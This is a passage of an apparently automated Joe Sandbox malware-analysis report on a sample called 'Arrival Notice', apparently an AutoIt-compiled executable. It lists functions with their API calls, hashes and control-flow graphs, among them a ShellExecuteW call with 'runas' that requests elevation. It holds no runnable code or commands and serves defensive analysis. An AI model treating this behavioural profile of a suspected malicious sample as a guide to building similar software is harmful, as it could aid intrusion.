                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                  • String ID: SCRIPT
                  • API String ID: 3051347437-3967369404
                  • Opcode ID: ab4052212b53f600a470cd5c4531274caa398e7809eb4599187c3fde3aff0681
                  • Instruction ID: 5323dd3555493027895ed02914f321e4ac407d9fa15725b73f6070d71bc69063
                  • Opcode Fuzzy Hash: ab4052212b53f600a470cd5c4531274caa398e7809eb4599187c3fde3aff0681
                  • Instruction Fuzzy Hash: B711EC34201300BFE7228FA5DC89F637BB9EBC6B01F244569B5028A660DBB0D8009664
                  Function 003F2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003B2B6B
                    • Part of subcall function 003B3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00481418,?,003B2E7F,?,?,?,00000000), ref: 003B3A78
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00472224), ref: 003F2C10
                  • ShellExecuteW.SHELL32(00000000,?,?,00472224), ref: 003F2C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                  • String ID: runas
                  • API String ID: 448630720-4000483414
                  • Opcode ID: 8e5af11df17626a785baa5bed551e969f4d4b510872659b4311dd536ff723142
                  • Instruction ID: 6b85da78b2e6d2485c4f27e910973860778bc14d57ef1c9b565e79f550123ba6
                  • Opcode Fuzzy Hash: 8e5af11df17626a785baa5bed551e969f4d4b510872659b4311dd536ff723142
                  • Instruction Fuzzy Hash: 6111D6712083056AC707FF60D892AFF7BA89F91708F54592EF7465B4A3CF248A4AC716
                  Function 0041DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?,003F5222), ref: 0041DBCE
                  • GetFileAttributesW.KERNELBASE(?), ref: 0041DBDD
                  • FindFirstFileW.KERNELBASE(?,?), ref: 0041DBEE
                  • FindClose.KERNEL32(00000000), ref: 0041DBFA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FileFind$AttributesCloseFirstlstrlen
                  • String ID:
                  • API String ID: 2695905019-0
                  • Opcode ID: 7eab7e6d7fc6e44b70f86fc92fc7becefae182cf7b8258cc5cdf7a7124f0e1f6
                  • Instruction ID: 3f4d11eae0f3e58fc1997c2756cf650c3f78f84580ffb67212d5664481580df7
                  • Opcode Fuzzy Hash: 7eab7e6d7fc6e44b70f86fc92fc7becefae182cf7b8258cc5cdf7a7124f0e1f6
                  • Instruction Fuzzy Hash: D5F0A078C119105782206B78AC4D8EB376CAE02334B184B53F936C21E0FBF45995C6DE
                  Function 003BBF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BuffCharUpper
                  • String ID: p#H
                  • API String ID: 3964851224-1830686593
                  • Opcode ID: 57dcc4a95ceeaba0b0c3a1183d1a1f96b327be9a643c39b67a6ebc6fb4d1959c
                  • Instruction ID: 179d78a03901fe86851f3fee2ab932a668e5b52c1e35f762dc95ef1e64b0fd4f
                  • Opcode Fuzzy Hash: 57dcc4a95ceeaba0b0c3a1183d1a1f96b327be9a643c39b67a6ebc6fb4d1959c
                  • Instruction Fuzzy Hash: F2A28C70608301CFD721DF28C480B6AB7E5BF89308F14986EE99A9B752D775EC45CB92
                  Function 003BD730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetInputState.USER32 ref: 003BD807
                  • timeGetTime.WINMM ref: 003BDA07
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003BDB28
                  • TranslateMessage.USER32(?), ref: 003BDB7B
                  • DispatchMessageW.USER32(?), ref: 003BDB89
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003BDB9F
                  • Sleep.KERNEL32(0000000A), ref: 003BDBB1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                  • String ID:
                  • API String ID: 2189390790-0
                  • Opcode ID: eb6e3814f7df34769c77fc2ea6c500d525ffe8c0765d53d3fee6d13c8ab9d84b
                  • Instruction ID: 473c1122c680876b700409ac2f77731ceee886fdd59d2deba918875d1a298723
                  • Opcode Fuzzy Hash: eb6e3814f7df34769c77fc2ea6c500d525ffe8c0765d53d3fee6d13c8ab9d84b
                  • Instruction Fuzzy Hash: 2042F670608341EFD72ACF24C888BAAB7E4BF45308F14456EE556976D1E7B4E844CF86
                  Function 003B2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetSysColorBrush.USER32(0000000F), ref: 003B2D07
                  • RegisterClassExW.USER32(00000030), ref: 003B2D31
                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B2D42
                  • InitCommonControlsEx.COMCTL32(?), ref: 003B2D5F
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003B2D6F
                  • LoadIconW.USER32(000000A9), ref: 003B2D85
                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003B2D94
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                  • API String ID: 2914291525-1005189915
                  • Opcode ID: d1eedee01c3e8a6f5ce2c28928b26b3c5a453293a34b446ddeb8e0319c479469
                  • Instruction ID: 15d6e09efbd5cd9eb5313c07cbda070cd96fbe65d060be0488eb6c57a3234074
                  • Opcode Fuzzy Hash: d1eedee01c3e8a6f5ce2c28928b26b3c5a453293a34b446ddeb8e0319c479469
                  • Instruction Fuzzy Hash: 0A21F7B5902309AFDB40DFE4EC89BDDBBB8FB09700F04452AF511A62A0D7B50541CF98
                  Function 003E8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 3e8d45-3e8d55 303 3e8d6f-3e8d71 302->303 304 3e8d57-3e8d6a call 3df2c6 call 3df2d9 302->304 306 3e90d9-3e90e6 call 3df2c6 call 3df2d9 303->306 307 3e8d77-3e8d7d 303->307 318 3e90f1 304->318 324 3e90ec call 3e27ec 306->324 307->306 310 3e8d83-3e8dae 307->310 310->306 313 3e8db4-3e8dbd 310->313 316 3e8dbf-3e8dd2 call 3df2c6 call 3df2d9 313->316 317 3e8dd7-3e8dd9 313->317 316->324 321 3e8ddf-3e8de3 317->321 322 3e90d5-3e90d7 317->322 323 3e90f4-3e90f9 318->323 321->322 326 3e8de9-3e8ded 321->326 322->323 324->318 326->316 327 3e8def-3e8e06 326->327 330 3e8e08-3e8e0b 327->330 331 3e8e23-3e8e2c 327->331 333 3e8e0d-3e8e13 330->333 334 3e8e15-3e8e1e 330->334 335 3e8e2e-3e8e45 call 3df2c6 call 3df2d9 call 3e27ec 331->335 336 3e8e4a-3e8e54 331->336 333->334 333->335 337 3e8ebf-3e8ed9 334->337 367 3e900c 335->367 339 3e8e5b-3e8e79 call 3e3820 call 3e29c8 * 2 336->339 340 3e8e56-3e8e58 336->340 342 3e8edf-3e8eef 337->342 343 3e8fad-3e8fb6 call 3ef89b 337->343 371 3e8e7b-3e8e91 call 3df2d9 call 3df2c6 339->371 372 3e8e96-3e8ebc call 3e9424 339->372 340->339 342->343 348 3e8ef5-3e8ef7 342->348 356 3e8fb8-3e8fca 343->356 357 3e9029 343->357 348->343 349 3e8efd-3e8f23 348->349 349->343 353 3e8f29-3e8f3c 349->353 353->343 358 3e8f3e-3e8f40 353->358 356->357 362 3e8fcc-3e8fdb GetConsoleMode 356->362 360 3e902d-3e9045 ReadFile 357->360 358->343 363 3e8f42-3e8f6d 358->363 365 3e9047-3e904d 360->365 366 3e90a1-3e90ac GetLastError 360->366 362->357 368 3e8fdd-3e8fe1 362->368 363->343 370 3e8f6f-3e8f82 363->370 365->366 375 3e904f 365->375 373 3e90ae-3e90c0 call 3df2d9 call 3df2c6 366->373 374 3e90c5-3e90c8 366->374 369 3e900f-3e9019 call 3e29c8 367->369 368->360 376 3e8fe3-3e8ffd ReadConsoleW 368->376 369->323 370->343 378 3e8f84-3e8f86 370->378 371->367 372->337 373->367 385 3e90ce-3e90d0 374->385 386 3e9005-3e900b call 3df2a3 374->386 382 3e9052-3e9064 375->382 383 3e901e-3e9027 376->383 384 3e8fff GetLastError 376->384 378->343 389 3e8f88-3e8fa8 378->389 382->369 393 3e9066-3e906a 382->393 383->382 384->386 385->369 386->367 389->343 397 3e906c-3e907c call 3e8a61 393->397 398 3e9083-3e908e 393->398 407 3e907f-3e9081 397->407 399 3e909a-3e909f call 3e88a1 398->399 400 3e9090 call 3e8bb1 398->400 408 3e9095-3e9098 399->408 400->408 407->369 408->407
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: .=
                  • API String ID: 0-4056814303
                  • Opcode ID: 3abb24b6545849b6b4b904187a217a6b09bafa0f056fc087ad1caac1cb901455
                  • Instruction ID: 02967e5ec887cc0f561052a4c11f124b1c8971f5b0ead1dac390cb9fde2bd79c
                  • Opcode Fuzzy Hash: 3abb24b6545849b6b4b904187a217a6b09bafa0f056fc087ad1caac1cb901455
                  • Instruction Fuzzy Hash: 8BC11675D042A99FCB13DFAAD841BADBBB4AF09310F05469AF519AB3D2C7308D41CB60
                  Function 003F065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 410 3f065b-3f068b call 3f042f 413 3f068d-3f0698 call 3df2c6 410->413 414 3f06a6-3f06b2 call 3e5221 410->414 421 3f069a-3f06a1 call 3df2d9 413->421 419 3f06cb-3f0714 call 3f039a 414->419 420 3f06b4-3f06c9 call 3df2c6 call 3df2d9 414->420 429 3f0716-3f071f 419->429 430 3f0781-3f078a GetFileType 419->430 420->421 431 3f097d-3f0983 421->431 435 3f0756-3f077c GetLastError call 3df2a3 429->435 436 3f0721-3f0725 429->436 432 3f078c-3f07bd GetLastError call 3df2a3 CloseHandle 430->432 433 3f07d3-3f07d6 430->433 432->421 447 3f07c3-3f07ce call 3df2d9 432->447 438 3f07df-3f07e5 433->438 439 3f07d8-3f07dd 433->439 435->421 436->435 440 3f0727-3f0754 call 3f039a 436->440 444 3f07e9-3f0837 call 3e516a 438->444 445 3f07e7 438->445 439->444 440->430 440->435 453 3f0839-3f0845 call 3f05ab 444->453 454 3f0847-3f086b call 3f014d 444->454 445->444 447->421 453->454 459 3f086f-3f0879 call 3e86ae 453->459 460 3f087e-3f08c1 454->460 461 3f086d 454->461 459->431 463 3f08c3-3f08c7 460->463 464 3f08e2-3f08f0 460->464 461->459 463->464 466 3f08c9-3f08dd 463->466 467 3f097b 464->467 468 3f08f6-3f08fa 464->468 466->464 467->431 468->467 469 3f08fc-3f092f CloseHandle call 3f039a 468->469 472 3f0963-3f0977 469->472 473 3f0931-3f095d GetLastError call 3df2a3 call 3e5333 469->473 472->467 473->472
                  APIs
                    • Part of subcall function 003F039A: CreateFileW.KERNELBASE(00000000,00000000,?,003F0704,?,?,00000000,?,003F0704,00000000,0000000C), ref: 003F03B7
                  • GetLastError.KERNEL32 ref: 003F076F
                  • __dosmaperr.LIBCMT ref: 003F0776
                  • GetFileType.KERNELBASE(00000000), ref: 003F0782
                  • GetLastError.KERNEL32 ref: 003F078C
                  • __dosmaperr.LIBCMT ref: 003F0795
                  • CloseHandle.KERNEL32(00000000), ref: 003F07B5
                  • CloseHandle.KERNEL32(?), ref: 003F08FF
                  • GetLastError.KERNEL32 ref: 003F0931
                  • __dosmaperr.LIBCMT ref: 003F0938
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                  • String ID: H
                  • API String ID: 4237864984-2852464175
                  • Opcode ID: d0be4ea0e2fbdde9e224ad5bb158eab203c8c0044f8cfa373824d2b9ce76aa7d
                  • Instruction ID: a9ef9c934229d90c5157f6480d61881797d3bbf33fc96dc6f916de6994adfd33
                  • Opcode Fuzzy Hash: d0be4ea0e2fbdde9e224ad5bb158eab203c8c0044f8cfa373824d2b9ce76aa7d
                  • Instruction Fuzzy Hash: ADA11436A101088FDF1EAF6CD891BBE7BA0AB06320F14415EF9159F3A2D7719916CB91
                  Function 003B344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 003B3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00481418,?,003B2E7F,?,?,?,00000000), ref: 003B3A78
                    • Part of subcall function 003B3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003B3379
                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003B356A
                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003F318D
                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003F31CE
                  • RegCloseKey.ADVAPI32(?), ref: 003F3210
                  • _wcslen.LIBCMT ref: 003F3277
                  • _wcslen.LIBCMT ref: 003F3286
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                  • API String ID: 98802146-2727554177
                  • Opcode ID: b8a01eb86dbd98b6405d9b113f8d55a009083e15a08346f9f448f705a23bce8b
                  • Instruction ID: 582f6a0cfcfecf44feb6e444848684ace1cf0eb4a62e3acc95749bed41bf8b7d
                  • Opcode Fuzzy Hash: b8a01eb86dbd98b6405d9b113f8d55a009083e15a08346f9f448f705a23bce8b
                  • Instruction Fuzzy Hash: 27719D71405304AEC316EF65ED929AFBBE8FF85344F40083EFA4587161EB749A48CB5A
                  Function 003B2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetSysColorBrush.USER32(0000000F), ref: 003B2B8E
                  • LoadCursorW.USER32(00000000,00007F00), ref: 003B2B9D
                  • LoadIconW.USER32(00000063), ref: 003B2BB3
                  • LoadIconW.USER32(000000A4), ref: 003B2BC5
                  • LoadIconW.USER32(000000A2), ref: 003B2BD7
                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003B2BEF
                  • RegisterClassExW.USER32(?), ref: 003B2C40
                    • Part of subcall function 003B2CD4: GetSysColorBrush.USER32(0000000F), ref: 003B2D07
                    • Part of subcall function 003B2CD4: RegisterClassExW.USER32(00000030), ref: 003B2D31
                    • Part of subcall function 003B2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003B2D42
                    • Part of subcall function 003B2CD4: InitCommonControlsEx.COMCTL32(?), ref: 003B2D5F
                    • Part of subcall function 003B2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003B2D6F
                    • Part of subcall function 003B2CD4: LoadIconW.USER32(000000A9), ref: 003B2D85
                    • Part of subcall function 003B2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003B2D94
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                  • String ID: #$0$AutoIt v3
                  • API String ID: 423443420-4155596026
                  • Opcode ID: 513e7b3ae7ec8c8ffadf6b14d66f149358f51c477e68e65debb64d816479b7c9
                  • Instruction ID: b335842fefd77959cdc2b8c8cfc79e94de38fb7863db81edee2a3fcf34b3de84
                  • Opcode Fuzzy Hash: 513e7b3ae7ec8c8ffadf6b14d66f149358f51c477e68e65debb64d816479b7c9
                  • Instruction Fuzzy Hash: 16211A74E01314ABEB109FA5EC95A9D7FB8FB48B50F04443FEA01A6AB0D7B50541CF98
                  Function 003BB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003BBB4E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: p#H$p#H$p#H$p#H$p%H$p%H$x#H$x#H
                  • API String ID: 1385522511-51995042
                  • Opcode ID: 1675831cc0d62ca68ea2a60caa04b80f89d20e0257483eea5d7106ac27d94335
                  • Instruction ID: 261756ca423bd70e90a40153ed0839a45f4cbe576aabe13770d1b3898cf29299
                  • Opcode Fuzzy Hash: 1675831cc0d62ca68ea2a60caa04b80f89d20e0257483eea5d7106ac27d94335
                  • Instruction Fuzzy Hash: D732A334A00209DFDB15CF54C894BBEB7B9EF44318F15806AEE05ABB91CBB8AD41CB55
                  Function 003B3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 758 3b3170-3b3185 759 3b3187-3b318a 758->759 760 3b31e5-3b31e7 758->760 761 3b31eb 759->761 762 3b318c-3b3193 759->762 760->759 763 3b31e9 760->763 767 3f2dfb-3f2e23 call 3b18e2 call 3ce499 761->767 768 3b31f1-3b31f6 761->768 764 3b3199-3b319e 762->764 765 3b3265-3b326d PostQuitMessage 762->765 766 3b31d0-3b31d8 DefWindowProcW 763->766 770 3f2e7c-3f2e90 call 41bf30 764->770 771 3b31a4-3b31a8 764->771 773 3b3219-3b321b 765->773 772 3b31de-3b31e4 766->772 802 3f2e28-3f2e2f 767->802 774 3b31f8-3b31fb 768->774 775 3b321d-3b3244 SetTimer RegisterWindowMessageW 768->775 770->773 795 3f2e96 770->795 777 3b31ae-3b31b3 771->777 778 3f2e68-3f2e77 call 41c161 771->778 773->772 781 3f2d9c-3f2d9f 774->781 782 3b3201-3b3214 KillTimer call 3b30f2 call 3b3c50 774->782 775->773 779 3b3246-3b3251 CreatePopupMenu 775->779 785 3f2e4d-3f2e54 777->785 786 3b31b9-3b31be 777->786 778->773 779->773 788 3f2dd7-3f2df6 MoveWindow 781->788 789 3f2da1-3f2da5 781->789 782->773 785->766 798 3f2e5a-3f2e63 call 410ad7 785->798 793 3b3253-3b3263 call 3b326f 786->793 794 3b31c4-3b31ca 786->794 788->773 796 3f2da7-3f2daa 789->796 797 3f2dc6-3f2dd2 SetFocus 789->797 793->773 794->766 794->802 795->766 796->794 803 3f2db0-3f2dc1 call 3b18e2 796->803 797->773 798->766 802->766 806 3f2e35-3f2e48 call 3b30f2 call 3b3837 802->806 803->773 806->766
                  APIs
                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,003B316A,?,?), ref: 003B31D8
                  • KillTimer.USER32(?,00000001,?,?,?,?,?,003B316A,?,?), ref: 003B3204
                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003B3227
                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,003B316A,?,?), ref: 003B3232
                  • CreatePopupMenu.USER32 ref: 003B3246
                  • PostQuitMessage.USER32(00000000), ref: 003B3267
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                  • String ID: TaskbarCreated
                  • API String ID: 129472671-2362178303
                  • Opcode ID: a526103689a9e645343e1bcf259e8ea64e306e9805f35f868d93e0479bfb2ede
                  • Instruction ID: acb49b94c72e9ea70b8b19cb72d98603a89d40f3da0c230596cbe7a767acb9dd
                  • Opcode Fuzzy Hash: a526103689a9e645343e1bcf259e8ea64e306e9805f35f868d93e0479bfb2ede
                  • Instruction Fuzzy Hash: 32412735240228A7DB172B7CDD4ABFD3A1DEB05348F04493BFB028ADA1CB74CA419769
                  Function 003BDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
